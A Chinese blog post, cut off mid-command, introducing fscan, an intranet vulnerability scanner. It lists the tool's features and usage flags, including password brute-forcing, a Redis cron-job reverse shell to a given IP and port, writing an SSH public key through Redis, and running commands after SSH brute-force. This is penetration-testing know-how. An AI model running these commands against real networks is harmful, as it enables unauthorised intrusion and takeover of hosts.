漏洞扫描工具（一）

最新推荐文章于 2024-04-10 13:06:45 发布

攻防小白

最新推荐文章于 2024-04-10 13:06:45 发布

阅读量5.3k

点赞数 2

文章标签：安全

本文链接：https://blog.csdn.net/weixin_52766206/article/details/126133464

版权

FSCAN

fscan 是一个内网综合扫描工具，方便一键自动化、全方位漏洞扫描。

它支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。

源码链接：GitHub - shadow1ng/fscan: 一款内网综合扫描工具，方便一键自动化、全方位漏扫扫描。

1.信息搜集:

存活探测(icmp)
端口扫描

2.爆破功能:

各类服务爆破(ssh、smb等)
数据库密码爆破(mysql、mssql、redis、psql等)

3.系统信息、漏洞扫描:

获取目标网卡信息
高危漏洞扫描(ms17010等)

4.Web探测功能:

webtitle探测
web指纹识别(常见cms、oa框架等)
web漏洞扫描(weblogic、st2等,支持xray的poc)

5.漏洞利用:

redis写公钥或写计划任务
ssh命令执行

6.其他功能:

文件保存

使用方法

fscan.exe -h 192.168.1.1/24  (默认使用全部模块)  
fscan.exe -h 192.168.1.1/16  (B段扫描)
fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描)  
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)  
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)  
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后，命令执行)  
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)  
fscan.exe -h 192